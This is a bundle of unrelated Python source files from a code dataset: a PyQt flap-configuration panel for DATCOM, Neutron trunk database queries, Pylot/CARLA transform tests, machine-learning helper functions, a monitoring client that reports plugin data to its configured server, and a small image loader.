'HowTo':{'1.0':['DELTAS', 'XSOC', 'HSOC'], \n '2.0':['DELTAS', 'XSOC', 'HSOC'], \n '3.0':['DELTAD', 'DELTAS', 'HSOC'], \n '4.0':['DELTAL', 'DELTAR' ], \n '5.0':['DELTAL', 'DELTAR' ], \n }, \n 'Group':'input'} , \n ] \n self.RuleVariableStatus = [ \n {'ControlVar':'STYPE', \n 'HowTo':{\n # 0 : 1.0 机翼襟翼扰流板\n '1.0':{'Disabled':[\n 'DELTAL', 'DELTAR' , \n 'CHRDFI', 'CHRDFO',\n 'DELTAD', \n ], \n 'Enabled':[\n 'STYPE' , 'NDELTA', \n 'SPANFI', 'SPANFO', \n 'PHETE' , 'XSPRME', \n 'DELTAS',\n 'XSOC' , 'HSOC',\n ]},\n # 1 : 2.0 机翼上的扰流板 \n '2.0':{'Disabled':[\n 'DELTAL', 'DELTAR' , \n 'CHRDFI', 'CHRDFO',\n 'DELTAD', \n ], \n 'Enabled':[\n 'STYPE' , 'NDELTA', \n 'SPANFI', 'SPANFO', \n 'PHETE' , 'XSPRME', \n 'DELTAS',\n 'XSOC' , 'HSOC',\n ]},\n # 2 : 3.0 扰流板槽偏转翼\n '3.0':{'Disabled':[\n 'DELTAL', 'DELTAR' , \n 'CHRDFI', 'CHRDFO',\n 'XSPRME', \n ], \n 'Enabled':[\n 'STYPE' , 'NDELTA', \n 'SPANFI', 'SPANFO', \n 'PHETE' , \n 'DELTAD','DELTAS',\n 'XSOC' , 'HSOC',\n ]},\n # 3 : 4.0 简单襟翼副翼 \n '4.0':{'Disabled':[\n 'XSPRME', \n 'XSOC' , 'HSOC',\n 'DELTAD', 'DELTAS',\n 'PHETE' ,\n ], \n 'Enabled':[\n 'STYPE' , 'NDELTA', \n 'DELTAL', 'DELTAR' ,\n 'CHRDFI', 'CHRDFO', \n 'SPANFI', 'SPANFO', \n ]},\n # 4 : 5.0 差动平尾 \n '5.0':{'Disabled':[\n 'SPANFI', 'SPANFO', \n 'XSPRME', \n 'CHRDFI', 'CHRDFO',\n 'DELTAD', 'DELTAS',\n 'XSOC' , 'HSOC',\n ], \n 'Enabled':[\n 'STYPE' , 'NDELTA', \n 'DELTAL', 'DELTAR' ,\n 'PHETE' ,\n ]}, \n }\n }\n ]\n\n #修改后台的数据\n if tModel is None:\n tModel = dcModel.dcModel('J6', '常规布局') \n #定义数据\n self.DatcomCARD = DC.DatcomCARD(self)\n #self.InitComboVar(tModel)\n self.DatcomCARD.InitUi()\n self.DatcomCARD.setModel(tModel) #设置模型\n \n #界面参数-表格逻辑\n self.curPos = QPoint(0, 0)\n self.curWidget = None\n self.curN = None\n self.popMenu = None \n self.tableWidget_input.setContextMenuPolicy(Qt.CustomContextMenu)\n \n #初始化数据和内容 \n self.UILogic() \n \n def setModel(self, tModel):\n \"\"\"\n 初始化本节点的xml描述文档\n \"\"\"\n \n #执行参数配置过程 \n #self.InitComboVar(tModel)\n self.DatcomCARD.setModel(tModel) \n self.UILogic()\n \n def getDoc(self):\n \"\"\"\n 将界面的内容刷新到变量model\n \"\"\" \n #执行界面刷新\n return self.DatcomCARD.getModel()\n \n def UILogic(self):\n \"\"\"\n 执行UI界面刷新操作\n \"\"\" \n self.DatcomCARD.UILogic()\n #其他表格的逻辑\n \n @pyqtSlot(int)\n def on_comboBox_STYPE_currentIndexChanged(self, index):\n \"\"\"\n Slot documentation goes here.\n \n @param index DESCRIPTION\n @type int\n \"\"\"\n self.UILogic()\n \n @pyqtSlot()\n def on_NDELTA_editingFinished(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n self.UILogic()\n \n @pyqtSlot(QPoint)\n def on_tableWidget_input_customContextMenuRequested(self, pos):\n \"\"\"\n Slot documentation goes here.\n \n @param pos DESCRIPTION\n @type QPoint\n \"\"\"\n self.curPos = pos\n self.curWidget = self.tableWidget_input \n posG = self.curWidget.mapToGlobal(pos)\n self.popMenu = QMenu(self.curWidget)\n self.popMenu.addAction(self.actionAddRow)\n self.popMenu.addAction(self.actionDeleteRow)\n self.curWidget.setContextMenuPolicy(Qt.CustomContextMenu)\n self.curN = self.NDELTA\n \n self.popMenu.exec(posG)\n \n @pyqtSlot()\n def on_actionAddRow_triggered(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n \n #添加行\n aItem = self.curWidget.indexAt(self.curPos) #认为是表格 ,否则会异常\n rowIndex = 0\n if aItem.row() == -1 :\n #没有命中\n rowIndex = self.curWidget.rowCount()\n else:\n rowIndex = aItem.row()\n \n tLimit = 9 \n if self.curWidget.rowCount() < tLimit:\n self.curWidget.insertRow(rowIndex)\n else:\n self.logger.info(\"%s已经达到最大行数不能添加\"%self.curWidget.objectName())\n if not self.curN is None: \n self.curN.setText(str(self.curWidget.rowCount()))\n \n self.UILogic() \n \n @pyqtSlot()\n def on_actionDeleteRow_triggered(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n \n aItem = self.curWidget.indexAt(self.curPos)\n if aItem.row() >= 0 : \n self.curWidget.removeRow(aItem.row())\n else:\n self.logger.info(\"没有命中任何行\")\n \n if not self.curN is None:\n self.curN.setText(str(self.curWidget.rowCount()))\n \n self.UILogic() \n","sub_path":"PyDatcomLab/GUIs/PlaneConfiguration/ASYFLP.py","file_name":"ASYFLP.py","file_ext":"py","file_size_in_byte":8343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"70213303","text":"\n\n#calss header\nclass _DIORAMA():\n\tdef __init__(self,): \n\t\tself.name = \"DIORAMA\"\n\t\tself.definitions = [u'a model that shows a situation, such as a historical event or animals in their natural environment, in a way that looks real: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_diorama.py","file_name":"_diorama.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"573253121","text":"# Copyright 2017 Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron.db import models_v2\nfrom neutron.db import segments_db\nfrom neutron.services.trunk import constants as t_consts\nfrom neutron.services.trunk import models\n\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy.orm import noload\n\n\ndef get_vlan_subports_of_trunk_physnet(session, trunk_id):\n cur_trunk = aliased(models.Trunk, name='cur_trunk')\n cur_parent_port = aliased(models_v2.Port, name='cur_parent_port')\n cur_parent_network = aliased(models_v2.Network, name='cur_parent_network')\n cur_parent_network_segment = aliased(segments_db.NetworkSegment,\n name='cur_parent_network_segment')\n other_parent_port = aliased(models_v2.Port, name='other_parent_port')\n\n return (\n session.query(models_v2.Port)\n .options(\n noload('*'),\n joinedload(models_v2.Port.sub_port),\n joinedload(models_v2.Port.fixed_ips))\n .join(\n (models.SubPort, models.SubPort.port_id == models_v2.Port.id),\n (models.Trunk, models.SubPort.trunk_id == models.Trunk.id),\n (other_parent_port, other_parent_port.id == models.Trunk.port_id),\n (models_v2.Network,\n models_v2.Network.id == other_parent_port.network_id),\n (segments_db.NetworkSegment,\n segments_db.NetworkSegment.network_id == models_v2.Network.id),\n (cur_parent_network_segment,\n cur_parent_network_segment.physical_network ==\n segments_db.NetworkSegment.physical_network),\n (cur_parent_network,\n cur_parent_network.id == cur_parent_network_segment.network_id),\n (cur_parent_port, cur_parent_port.network_id ==\n cur_parent_network.id),\n (cur_trunk, cur_parent_port.id == cur_trunk.port_id),\n )\n .filter(\n cur_trunk.id == trunk_id,\n models.SubPort.segmentation_type == t_consts.VLAN)\n ).all()\n\n\ndef get_vlan_subports_of_trunk(session, trunk_id):\n return (\n session.query(models_v2.Port)\n .options(\n noload('*'),\n joinedload(models_v2.Port.sub_port),\n joinedload(models_v2.Port.fixed_ips))\n .join(\n (models.SubPort, models.SubPort.port_id == models_v2.Port.id),\n (models.Trunk, models.SubPort.trunk_id == models.Trunk.id)\n )\n .filter(\n models.Trunk.id == trunk_id,\n models.SubPort.segmentation_type == t_consts.VLAN)\n ).all()\n","sub_path":"nuage_neutron/plugins/common/trunk_db.py","file_name":"trunk_db.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387395071","text":"import pytest\n\nfrom collections import namedtuple\nimport numpy as np\n\nimport carla\nfrom pylot.utils import Location, Rotation, Transform, Vector2D\nfrom pylot.perception.depth_frame import DepthFrame\nfrom pylot.perception.point_cloud import PointCloud\nfrom pylot.simulation.sensor_setup import CameraSetup\n\n## Location Tests\n\n\ndef test_empty_location():\n \"\"\" Test that an empty Location is initializes at (0, 0, 0) \"\"\"\n empty_location = Location()\n assert np.isclose(empty_location.x, 0), \"X value is not zero\"\n assert np.isclose(empty_location.y, 0), \"Y value is not zero\"\n assert np.isclose(empty_location.z, 0), \"Z value is not zero\"\n\n\n@pytest.mark.parametrize(\"x, y, z\", [(10, 20, 30), (-10, -20, -30)])\ndef test_location_creation(x, y, z):\n \"\"\" Test that the Location is initialized correctly. \"\"\"\n location = Location(x, y, z)\n assert np.isclose(location.x, x), \"X values are not the same.\"\n assert np.isclose(location.y, y), \"Y values are not the same.\"\n assert np.isclose(location.z, z), \"Z values are not the same.\"\n\n\n@pytest.mark.parametrize(\"x, y, z\", [(10, 20, 30), (-10, -20, -30)])\ndef test_location_from_carla(x, y, z):\n \"\"\" Test that the Location is initialized correctly from a carla.Location\n instance \"\"\"\n location = Location.from_carla_location(carla.Location(x, y, z))\n assert np.isclose(location.x, x), \"X values are not the same.\"\n assert np.isclose(location.y, y), \"Y values are not the same.\"\n assert np.isclose(location.z, z), \"Z values are not the same.\"\n\n\ndef test_negative_location_from_carla():\n \"\"\" Test that Location throws a ValueError if incorrect carla_loc argument\n is passed. \"\"\"\n DummyType = namedtuple(\"DummyType\", \"x, y, z\")\n dummy_instance = DummyType(10, 20, 30)\n with pytest.raises(ValueError):\n Location.from_carla_location(dummy_instance)\n\n\n@pytest.mark.parametrize(\"point_a, point_b, expected\",\n [((1, 2, 3), (1, 2, 3), 0),\n ((10, 20, 30), (40, 50, 60), 51.961524227)])\ndef test_distance(point_a, point_b, expected):\n \"\"\" Test the distance computed between two points is the same as expected\"\"\"\n location_a, location_b = Location(*point_a), Location(*point_b)\n assert np.isclose(location_a.distance(location_b), expected), \"Distance \"\n \"between point_a and point_b is not the same as the expected distance.\"\n assert np.isclose(location_b.distance(location_a), expected), \"Distance \"\n \"between point_b and point_a is not the same as the expected distance.\"\n\n\ndef test_as_carla_location():\n \"\"\" Test the as_carla_location instance method of Location \"\"\"\n location = Location(x=1, y=2, z=3)\n carla_location = location.as_carla_location()\n assert isinstance(carla_location, carla.Location), \"Returned instance is \"\n \"not of the type carla.Location\"\n assert np.isclose(carla_location.x, location.x), \"Returned instance x \"\n \"value is not the same as the one in location.\"\n assert np.isclose(carla_location.y, location.y), \"Returned instance y \"\n \"value is not the same as the one in location.\"\n assert np.isclose(carla_location.z, location.z), \"Returned instance z \"\n \"value is not the same as the one in location.\"\n\n\ndef test_as_numpy_array():\n \"\"\" Test the as_carla_location instance method of Location \"\"\"\n location = Location(x=1, y=2, z=3)\n np_array = location.as_numpy_array()\n assert isinstance(np_array, np.ndarray), \"Returned instance is \"\n \"not of the type np.ndarray\"\n assert all(np.isclose(np_array, [1, 2, 3])), \"Returned instance x, y, z \"\n \"values are not the same as the one in location.\"\n\n\n@pytest.mark.parametrize(\"point_a, point_b, expected\", [\n ((1, 2, 3), (1, 2, 3), (2, 4, 6)),\n ((1, 2, 3), (-1, -2, -3), (0, 0, 0)),\n])\ndef test_addition(point_a, point_b, expected):\n \"\"\" Test the addition of the two locations. \"\"\"\n location_a, location_b = Location(*point_a), Location(*point_b)\n sum_location = location_a + location_b\n assert isinstance(sum_location, Location), \"The sum was not of the type \"\n \"Location\"\n assert np.isclose(expected[0], sum_location.x), \"The x value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[1], sum_location.y), \"The y value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[2], sum_location.z), \"The z value of the sum \"\n \"was not the same as the expected value.\"\n\n\n@pytest.mark.parametrize(\"point_a, point_b, expected\", [\n ((1, 2, 3), (1, 2, 3), (0, 0, 0)),\n ((1, 2, 3), (-1, -2, -3), (2, 4, 6)),\n])\ndef test_subtraction(point_a, point_b, expected):\n \"\"\" Test the addition of the two locations. \"\"\"\n location_a, location_b = Location(*point_a), Location(*point_b)\n diff_location = location_a - location_b\n assert isinstance(diff_location, Location), \"The sum was not of the type \"\n \"Location\"\n assert np.isclose(expected[0], diff_location.x), \"The x value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[1], diff_location.y), \"The y value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[2], diff_location.z), \"The z value of the sum \"\n \"was not the same as the expected value.\"\n\n\n# TODO (Sukrit):: Write tests for to_camera_view after the CameraSetup tests.\n\n## Rotation Tests\n\n\ndef test_empty_rotation():\n \"\"\" Test that an empty Location is initializes at (0, 0, 0) \"\"\"\n empty_rotation = Rotation()\n assert np.isclose(empty_rotation.pitch, 0), \"pitch value is not zero\"\n assert np.isclose(empty_rotation.yaw, 0), \"yaw value is not zero\"\n assert np.isclose(empty_rotation.roll, 0), \"roll value is not zero\"\n\n\n@pytest.mark.parametrize(\"pitch, yaw, roll\", [(90, 90, 90), (0, 0, 0)])\ndef test_rotation(pitch, yaw, roll):\n \"\"\" Test the creation of Rotation from pitch, yaw, roll. \"\"\"\n rotation = Rotation(pitch, yaw, roll)\n assert np.isclose(rotation.pitch, pitch), \"The pitch was not the same.\"\n assert np.isclose(rotation.yaw, yaw), \"The yaw was not the same.\"\n assert np.isclose(rotation.roll, roll), \"The roll was not the same.\"\n\n\n@pytest.mark.parametrize(\"pitch, yaw, roll\", [(90, 90, 90), (0, 0, 0)])\ndef test_rotation_from_carla(pitch, yaw, roll):\n \"\"\" Test that the Rotation is initialized correctly from a carla.Rotation\n instance \"\"\"\n carla_rotation = carla.Rotation(pitch, yaw, roll)\n rotation = Rotation.from_carla_rotation(carla_rotation)\n assert np.isclose(rotation.pitch, pitch), \"pitch values are not the same.\"\n assert np.isclose(rotation.yaw, yaw), \"yaw values are not the same.\"\n assert np.isclose(rotation.roll, roll), \"roll values are not the same.\"\n\n\ndef test_negative_rotation_from_carla():\n \"\"\" Test that Rotation throws a ValueError if incorrect carla_rot argument\n is passed. \"\"\"\n DummyType = namedtuple(\"DummyType\", \"pitch, yaw, roll\")\n dummy_instance = DummyType(10, 20, 30)\n with pytest.raises(ValueError):\n Rotation.from_carla_rotation(dummy_instance)\n\n\ndef test_as_carla_rotation():\n \"\"\" Test the as_carla_rotation instance method of Rotation \"\"\"\n rotation = Rotation(pitch=1, yaw=2, roll=3)\n carla_rotation = rotation.as_carla_rotation()\n assert isinstance(carla_rotation, carla.Rotation), \"Returned instance is \"\n \"not of the type carla.Rotation\"\n assert np.isclose(carla_rotation.pitch, rotation.pitch), \"Returned \"\n \"instance pitch value is not the same as the one in rotation.\"\n assert np.isclose(carla_rotation.yaw, rotation.yaw), \"Returned instance \"\n \"yaw value is not the same as the one in rotation.\"\n assert np.isclose(carla_rotation.roll, rotation.roll), \"Returned instance \"\n \"roll value is not the same as the one in location.\"\n\n## Depth Frame Tests\n\n@pytest.mark.parametrize(\"x, y, z, threshold, expected\", [\n (1, 0, 150, 100, True),\n (1, 0, 150, 25, False),\n (2, 1, 300, 250, True),\n (2, 1, 300, 150, False)\n])\ndef test_pixel_has_same_depth(x, y, z, threshold, expected):\n \"\"\"Tests if the pixel at (x,y) has a depth within the specified\n threshold of z.\"\"\"\n camera_setup = None\n depth_frame = DepthFrame([[0, 0.1, 0],\n [0, 0, 0.5]],\n camera_setup)\n assert depth_frame.pixel_has_same_depth(x, y, z, threshold) is expected, \\\n \"Depth thresholding did not work correctly.\"\n\n\n@pytest.mark.parametrize(\"depth_frame, expected\", [\n (np.array([[0.4, 0.3], [0.2, 0.1]]), \\\n [Location(400, -400, 400), Location(300, 300, 300), \\\n Location(200, -200, -200), Location(100, 100, -100)]),\n (np.array([[0.1, 0.2]]), [Location(100, -100, 0), Location(200, 200, 0)]),\n (0.01 * np.ones((3,3)), \\\n [Location(10, -10, 10), Location(10, 0, 10), Location(10, 10, 10),\n Location(10, -10, 0), Location(10, 0, 0), Location(10, 10, 0),\n Location(10, -10, -10), Location(10, 0, -10), Location(10, 10, -10)])\n])\ndef test_depth_to_point_cloud(depth_frame, expected):\n height, width = depth_frame.shape\n camera_setup = CameraSetup('test_setup', 'test_type',\n width, height,\n Transform(location=Location(0, 0, 0),\n rotation=Rotation(0, 0, 0)),\n fov=90)\n depth_frame = DepthFrame(depth_frame, camera_setup)\n # Resulting unreal coordinates.\n point_cloud = depth_frame.as_point_cloud()\n for i in range(width * height):\n assert np.isclose(point_cloud[i].x, expected[i].x), 'Returned x '\n 'value is not the same as expected'\n assert np.isclose(point_cloud[i].y, expected[i].y), 'Returned y '\n 'value is not the same as expected'\n assert np.isclose(point_cloud[i].z, expected[i].z), 'Returned z '\n 'value is not the same as expected'\n\n\n@pytest.mark.parametrize(\"depth_frame, expected\", [\n (np.array([[0.1, 0.1]]), [Location(110, -80, 30), Location(110, 120, 30)])\n])\ndef test_depth_to_point_cloud_nonzero_camera_loc(depth_frame, expected):\n height, width = depth_frame.shape\n camera_setup = CameraSetup('test_setup', 'test_type',\n width, height,\n Transform(location=Location(10, 20, 30),\n rotation=Rotation(0, 0, 0)),\n fov=90)\n depth_frame = DepthFrame(depth_frame, camera_setup)\n # Resulting unreal coordinates.\n point_cloud = depth_frame.as_point_cloud()\n print (point_cloud)\n for i in range(width * height):\n assert np.isclose(point_cloud[i].x, expected[i].x), 'Returned x '\n 'value is not the same as expected'\n assert np.isclose(point_cloud[i].y, expected[i].y), 'Returned y '\n 'value is not the same as expected'\n assert np.isclose(point_cloud[i].z, expected[i].z), 'Returned z '\n 'value is not the same as expected'\n\n\n@pytest.mark.parametrize(\"depth_frame, pixels, expected\", [\n (np.array([[0.4, 0.3], [0.2, 0.1]]), \\\n [Vector2D(0,1), Vector2D(1,0)], \\\n [Location(200, -200, -200), Location(300, 300, 300)])\n])\ndef test_get_pixel_locations(depth_frame, pixels, expected):\n height, width = depth_frame.shape\n camera_setup = CameraSetup('test_setup', 'test_type',\n width, height,\n Transform(location=Location(0, 0, 0),\n rotation=Rotation(0, 0, 0)),\n fov=90)\n depth_frame = DepthFrame(depth_frame, camera_setup)\n locations = depth_frame.get_pixel_locations(pixels)\n for i in range(len(pixels)):\n assert np.isclose(locations[i].x, expected[i].x), 'Returned x '\n 'value is not the same as expected'\n assert np.isclose(locations[i].y, expected[i].y), 'Returned y '\n 'value is not the same as expected'\n assert np.isclose(locations[i].z, expected[i].z), 'Returned z '\n 'value is not the same as expected'\n\n\n## Point Cloud Tests\n\n@pytest.mark.parametrize(\"points, expected\", [\n ([Location(1,0,0), Location(0,1,0), Location(0,0,1), Location(1,2,3)],\n [[1,0,0],[0,0,-1],[0,1,0],[1,3,-2]])\n])\ndef test_initialize_point_cloud(points, expected):\n point_cloud = PointCloud(points, Transform(Location(), Rotation()))\n for i in range(len(expected)):\n assert all(np.isclose(point_cloud.points[i], expected[i]))\n\n\n@pytest.mark.parametrize(\"lidar_points, pixel, expected\", [\n\n # In this test, lidar points are first converted to camera coordinates,\n # when constructing the PointCloud. Then, get_pixel_location finds the\n # closest point in the point cloud, normalizes our query to have the\n # same depth as this closest point, and converts to unreal coordinates.\n #\n # For example, in the first test case, the lidar points in camera coordinates\n # are (-1,0,1),(1,0,1), and the query pixel is (-0.5, 0, 1). The closest lidar\n # point is (-1,0,1), so the normalization step has no effect. Finally,\n # converting the query pixel to unreal coordinates gives (1, -0.5, 0).\n\n # Lidar Points are left middle and right middle, same depth.\n ([Location(-1,-1,0),Location(1,-1,0)], Vector2D(200, 300), Location(1, -0.5, 0)),\n ([Location(-1,-1,0),Location(1,-1,0)], Vector2D(600, 300), Location(1, 0.5, 0)),\n # Lidar points are left middle and right middle, different depth.\n ([Location(-2,-2,0),Location(1,-1,0)], Vector2D(200, 300), Location(2, -1, 0)),\n ([Location(-2,-2,0),Location(1,-1,0)], Vector2D(600, 300), Location(1, 0.5, 0)),\n # Lidar points are top left and bottom right, same depth.\n ([Location(-2,-2,-1.5),Location(2,-2,1.5)], Vector2D(200, 150), Location(2,-1,0.75)),\n])\ndef test_point_cloud_get_pixel_location(lidar_points, pixel, expected):\n camera_setup = CameraSetup('test_setup', 'test_type',\n 801, 601, # width, height\n Transform(location=Location(0,0,0),\n rotation=Rotation(0,0,0)),\n fov=90)\n point_cloud = PointCloud(lidar_points, Transform(Location(), Rotation()))\n location = point_cloud.get_pixel_location(pixel, camera_setup)\n assert np.isclose(location.x, expected.x), 'Returned x value is not the same '\n 'as expected'\n assert np.isclose(location.y, expected.y), 'Returned y value is not the same '\n 'as expected'\n assert np.isclose(location.z, expected.z), 'Returned z value is not the same '\n 'as expected'\n","sub_path":"tests/test_transforms.py","file_name":"test_transforms.py","file_ext":"py","file_size_in_byte":14589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134147359","text":"# -*- coding: utf-8 -*-\n######################################################################\n## A parte de las funciones aquí implementadas, necesitareis ##\n## np.random.uniform(rango[0], rango[1], size=(N, dim0, dim1, ...)) ## \n## que se corresponde con simula_unif(N, dim, rango) ## \n######################################################################\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Función que devuelve un vector de forma con valores aleatorios \n# extraídos de una normal de media y varianza .\n# Se corresponde con simula_gaus(N, dim, sigma), en caso de llamarla\n# con simula_gaus((N, dim0, dim1, ...), sigma).\ndef simula_gaus(size, sigma, media=None):\n media = 0 if media is None else media\n \n if len(size) > 2:\n N = size[0]\n size_sub = size[1:]\n \n out = np.zeros(size, np.float64)\n \n for i in range(N):\n out[i] = np.random.normal(loc=mean, scale=sigma, size=size_sub)\n \n else:\n out = np.random.normal(loc=mean, scale=sigma, size=size)\n \n return out\n\n\n# Función que devuelve los parámetros a y b de una recta aleatoria,\n# y = a*x + b, tal que dicha recta corta al cuadrado definido por \n# por los puntos (intervalo[0], intervalo[0]) y \n# (intervalo[1], intervalo[1]).\ndef simula_recta(intervalo=(-1,1), ptos = None):\n if ptos is None: \n m = np.random.uniform(intervalo[0], intervalo[1], size=(2, 2))\n \n a = (m[0,1]-m[1,1])/(m[0,0]-m[1,0]) # Calculo de la pendiente.\n b = m[0,1] - a*m[0,0] # Calculo del termino independiente.\n \n return a, b\n\n'''\n Transforma los parámetros de una recta 2d a los coeficientes de w.\n a: Pendiente de la recta.\n b: Término independiente de la recta.\n'''\ndef line2coef(a, b):\n w = np.zeros(3, np.float64)\n #w[0] = a/(1-a-b)\n #w[2] = (b-b*w[0])/(b-1)\n #w[1] = 1 - w[0] - w[2]\n \n #Suponemos que w[1] = 1\n w[0] = a\n w[1] = 1.0\n w[2] = b\n \n return w\n\n\n'''\n Pinta los datos con su etiqueta y la recta definida por a y b.\n X: Datos (Intensidad promedio, Simetría).\n y: Etiquetas (-1, 1).\n a: Pendiente de la recta.\n b: Término independiente de la recta.\n'''\ndef plot_datos_recta(X, y, a, b, title='Point clod plot', xaxis='x axis', yaxis='y axis'):\n #Preparar datos\n w = line2coef(a, b)\n min_xy = X.min(axis=0)\n max_xy = X.max(axis=0)\n border_xy = (max_xy-min_xy)*0.01\n \n #Generar grid de predicciones\n xx, yy = np.mgrid[min_xy[0]-border_xy[0]:max_xy[0]+border_xy[0]+0.001:border_xy[0], \n min_xy[1]-border_xy[1]:max_xy[1]+border_xy[1]+0.001:border_xy[1]]\n grid = np.c_[xx.ravel(), yy.ravel(), np.ones_like(xx).ravel()]\n pred_y = grid.dot(w)\n pred_y = np.clip(pred_y, -1, 1).reshape(xx.shape)\n \n #Plot\n f, ax = plt.subplots(figsize=(8, 6))\n contour = ax.contourf(xx, yy, pred_y, 50, cmap='RdBu',\n vmin=-1, vmax=1)\n ax_c = f.colorbar(contour)\n ax_c.set_label('$w^tx$')\n ax_c.set_ticks([-1, -0.75, -0.5, -0.25, 0, 0.25, 0.5, 0.75, 1])\n ax.scatter(X[:, 0], X[:, 1], c=y, s=50, linewidth=2, \n cmap=\"RdYlBu\", edgecolor='white', label='Datos')\n ax.plot(grid[:, 0], -a*grid[:, 0]-b, 'black', linewidth=2.0, label='Solucion')\n ax.set(\n xlim=(min_xy[0]-border_xy[0], max_xy[0]+border_xy[0]), \n ylim=(min_xy[1]-border_xy[1], max_xy[1]+border_xy[1]),\n xlabel=xaxis, ylabel=yaxis)\n ax.legend()\n plt.title(title)\n plt.show()\n\n \n","sub_path":"Practicas/practica2/Funciones_necesarias_p2.py","file_name":"Funciones_necesarias_p2.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"32481391","text":"import time, threading, json\nimport requests\nfrom conf import settings\nfrom plugins import plugin_api\n\n\nclass ClientHandlers(object):\n\n def __init__(self):\n self.monitor_services = {}\n\n\n def load_latest_config(self):\n \"\"\"\n 加载最新的配置信息\n :return:\n \"\"\"\n request_type = settings.configs[\"urls\"][\"get_configs\"][1]\n request_url = \"%s/%s\" % (settings.configs[\"urls\"][\"get_configs\"][0], settings.configs[\"HostIP\"])\n lastest_config = self.url_request(request_type, request_url)\n self.monitor_services.update(lastest_config)\n\n\n def forever_run(self):\n exit_flag = False\n config_lastest_update_time = 0\n while not exit_flag:\n if time.time() - config_lastest_update_time > settings.configs[\"ConfigUpdateInterval\"]:\n self.load_latest_config()\n print(\"Lastest_config:\", self.monitor_services)\n config_lastest_update_time = time.time()\n\n for service_name, val in self.monitor_services[\"services\"].items():\n if len(val) == 2:\n self.monitor_services[\"services\"][service_name].append(0)\n monitor_interval = val[1]\n last_invoke_time = val[2]\n if time.time() - last_invoke_time > monitor_interval:\n print(\"---->\", last_invoke_time, \"---->\", time.time())\n self.monitor_services[\"services\"][service_name][2] = time.time()\n t = threading.Thread(target=self.invoke_plugin, args=(service_name, val))\n t.start()\n print(\"start monitor service: [{ServiceName}]\".format(ServiceName=service_name))\n else:\n print(\"Going to monitor service [{ServiceName}] in [{interval}] secs\".format(ServiceName=service_name, interval=monitor_interval - (time.time() - last_invoke_time)))\n time.sleep(1)\n\n\n def invoke_plugin(self, service_name, val):\n plugin_name = val[0]\n if hasattr(plugin_api, plugin_name):\n func = getattr(plugin_api, plugin_name)\n plugin_callback = func()\n print(plugin_callback)\n\n report_data = {\n \"client_ip\": settings.configs['HostIP'],\n \"service_name\": service_name,\n \"data\": json.dumps(plugin_callback),\n }\n\n request_action = settings.configs[\"urls\"][\"service_report\"][1]\n request_url = settings.configs[\"urls\"][\"service_report\"][0]\n self.url_request(request_action, request_url, params=report_data)\n else:\n print(\"\\033[31mCannot find service [%s]' plugin name [%s] in plugin_api\\033[0m\" % (service_name, plugin_name))\n print('--plugin:', val)\n\n\n def url_request(self, action, request_url, **extra_data):\n abs_url = \"http://{ip_addr}:{port}/{url}\".format(ip_addr=settings.configs[\"Server\"],\n port=settings.configs[\"ServerPort\"],\n url=request_url)\n print(\"\\033[31m{abs_url}\\033[0m\".format(abs_url=abs_url), type(extra_data), extra_data)\n print(extra_data)\n if action in ('get', \"GET\"):\n print(abs_url, extra_data)\n try:\n r = requests.get(abs_url, timeout=settings.configs[\"RequestTimeout\"])\n r_data = r.json()\n return r_data\n except requests.RequestException as E:\n exit(\"\\033[31;1m%s\\033[0m\" % E)\n\n elif action in ('post', 'POST'):\n try:\n data = json.dumps(extra_data['params'])\n req = requests.post(url=abs_url, data=extra_data[\"params\"])\n res_data = req.json()\n print(\"------------------------------------------------------\")\n print(\"\\033[31;1m[%s]:[%s]\\033[0m response:\\n%s,%s\" % (action, abs_url, res_data, data))\n print(\"------------------------------------------------------\")\n return res_data\n except Exception as e:\n print('-----exce', e)\n print(\"\\033[31m;1m%s\\033[0m\" % e)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"monitoring_control/monitor_client/core/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"364869703","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 1 13:53:42 2018\n\n@author: admin\n\"\"\"\n\nimport os\nimport cv2\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\ndef read_image(img_name):\n img=cv2.imread(img_name)\n img=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY) #转换为灰度图像\n data=np.array(img)\n return data\n\nimages=[]\nfor fn in os.listdir('./images'):\n if fn.endswith('.png'):\n fd=os.path.join('./images',fn)\n images.append(read_image(fd))\n print('load success!')\n X=np.array(images)\n print(X.shape)\n 